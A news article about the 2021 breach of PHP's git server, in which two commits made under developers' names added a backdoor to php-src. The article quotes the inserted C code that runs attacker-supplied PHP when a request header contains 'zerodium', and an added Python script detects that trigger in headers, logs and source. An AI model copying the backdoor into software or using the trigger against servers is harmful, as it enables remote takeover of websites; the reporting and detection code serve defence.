Hackers backdoor PHP source code after internal git server breach | GeekComparison


A hacker has compromised the server used to distribute the PHP programming language and added a backdoor to the source code that would have left websites vulnerable to full takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added code that, if run by a PHP-powered website, would have allowed unauthorized visitors to execute code of their choice. The malicious commits here and here gave visitors who sent the word “zerodium” in an HTTP header the ability to inject code.

PHP.net hacked, code backdoored

The commits were made to the php-src repo under the account names of two well-known PHP developers, Rasmus Lerdorf and Nikita Popov. “We don’t know exactly how this happened yet, but everything points to a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov wrote in a post published Sunday night.

In the wake of the compromise, Popov said PHP administrators have concluded that their standalone Git infrastructure poses an unnecessary security risk. As a result, they will shut down the git.php.net server and make GitHub the official source for PHP repositories. In the future, all changes to the PHP source code will be made directly in GitHub rather than in git.php.net.

The malicious changes came to the attention of developers, including Markus Staab, Jake Birchall and Michael Voříšek, on Sunday night as they scrutinized a commit made on Saturday. The update, which claimed to fix a typo, was made under an account that used Lerdorf’s name. Shortly after the first discovery, Voříšek spotted the second malicious commit, which was made under Popov’s account name. It claimed to fix the previous typo.

Both commits added the same lines of code:

	/* enc holds a request header value; if it contains "zerodium", everything after its first 8 bytes is evaluated as PHP */
	convert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {
		zend_try {
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
		} zend_end_try();
	}
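As an added example (not code from the article, from the PHP project, or from the commits), the following Python turns the snippet’s own test into detection logic: it applies the strstr-plus-offset check to request headers and to combined-format access log lines, and scans source text for the literal strings the commits inserted. The log lines, the source text and the header names are constructed for the demo; the article does not name the header the backdoor read, so every header of a request is checked.

```python
"""Defender-side checks for the php-src backdoor described above.

Added example, not code from the article or from the PHP project. All sample
log lines, header names and source text below are constructed for the demo.
"""
import re

# The inserted code called strstr() on a request header value, so the word may
# appear anywhere in the value; it then handed Z_STRVAL_P(enc)+8 (the value with
# its first 8 bytes, the length of "zerodium", removed) to zend_eval_string().
TRIGGER = "zerodium"
SKIP = len(TRIGGER)  # 8, matching the +8 offset in the snippet

# Literal strings the two commits inserted; grepping a checkout or the git
# history for them is a cheap integrity check.
SOURCE_MARKERS = ("zerodium", "REMOVETHIS: sold to zerodium")

# Apache/nginx "combined" access log format. Only the Referer and User-Agent
# header values are recorded there, so this is a partial check; the article
# does not say which header the backdoor read.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def scan_headers(headers):
    """Apply the backdoor's own test to every header of one request.

    Returns a list of (header name, text the backdoor would have evaluated).
    """
    hits = []
    for name, value in headers.items():
        if TRIGGER in value:  # same semantics as strstr(): anywhere in the value
            hits.append((name, value[SKIP:]))
    return hits


def scan_access_log(lines):
    """Flag combined-format log lines whose User-Agent or Referer carries the trigger."""
    alerts = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED_LOG.match(line.rstrip("\n"))
        if not m:
            continue  # unparseable line; a real pipeline would count these
        for field in ("ua", "referer"):
            value = m.group(field)
            if TRIGGER in value:
                alerts.append({
                    "line": lineno,
                    "ip": m.group("ip"),
                    "field": field,
                    "evaluated": value[SKIP:],
                })
    return alerts


def scan_source(text):
    """Return 1-based line numbers of a source file that contain a backdoor marker."""
    return [
        n for n, line in enumerate(text.splitlines(), 1)
        if any(marker in line for marker in SOURCE_MARKERS)
    ]


# Constructed sample data (RFC 5737 documentation addresses, placeholder payload).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Mar/2021:20:11:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [28/Mar/2021:20:11:07 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "zerodiumREDACTED"',
    '198.51.100.2 - - [28/Mar/2021:20:12:00 +0000] "POST /login HTTP/1.1" 302 0 "http://example.test/zerodium" "curl/7.74"',
]

# Constructed source text carrying the inserted lines, to exercise scan_source().
SAMPLE_SOURCE = """\
static int handle(zval *enc)
{
    convert_to_string(enc);
    if (strstr(Z_STRVAL_P(enc), "zerodium")) {
        zend_try {
            zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
        } zend_end_try();
    }
    return 0;
}
"""

if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(f"log line {alert['line']} from {alert['ip']}: {alert['field']} "
              f"would have evaluated {alert['evaluated']!r}")
    print("marker lines in sample source:", scan_source(SAMPLE_SOURCE))
```

Because the inserted code used strstr(), the word trips the check wherever it appears in the value, while the +8 offset only lines up with a payload when the word is at the start; the third sample line shows a Referer that matches even though the slice after offset 8 is not PHP. Any hit is worth an alert, and a match at offset 0 is the case to treat as an attempted execution rather than noise.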

Zerodium is a broker that buys exploits from researchers and sells them to government agencies for use in investigations or other purposes. Why the commits reference Zerodium is not clear. The CEO of the company, Chaouki Bekrar, said on Twitter Monday that Zerodium was not involved.

“Cheers to the troll who put ‘Zerodium’ in the current PHP git compromised commits,” he wrote. “Of course we have nothing to do with this. Probably the researcher(s) who found this bug/exploit tried to sell it to many entities, but nobody wanted to buy this crap, so they burned it for fun.”

Bad karma

Prior to the compromise, the PHP Group handled all write access to the repository on its own git server, http://git.php.net/, using what Popov called a “homegrown” system called Karma. It granted developers different levels of access rights depending on their previous contributions. GitHub, meanwhile, had been a mirror repository.

Now the PHP Group is leaving the self-hosted and managed git infrastructure and replacing it with GitHub. The change means that GitHub is now the “canonical” repository. The PHP Group will no longer use the Karma system. Instead, contributors must be part of the PHP organization on GitHub and must use two-factor authentication for accounts with the ability to make commits.

This weekend’s event isn’t the first time php.net servers have been hacked with the intent of launching a supply chain attack. In early 2019, the widely used PHP extension and application repository temporarily shut down most of its site after discovering that hackers had replaced the main package manager with a malicious one. PHP Group developers said anyone who had downloaded the package manager in the previous six months should get a fresh copy.

PHP powers an estimated 80 percent of websites. There are no reports of websites having incorporated the malicious changes into their production environments.

The changes were likely made by people who wanted to brag about their unauthorized access to the PHP Git server rather than backdooring websites that use PHP, said HD Moore, co-founder and CEO of network discovery platform Rumble.

“It sounds like the attackers are trolling Zerodium or trying to give the impression that the code has been behind the scenes for much longer,” he told Ars. “Anyway, I’d spend a lot of time going through past commits if I had security interests in PHP.”
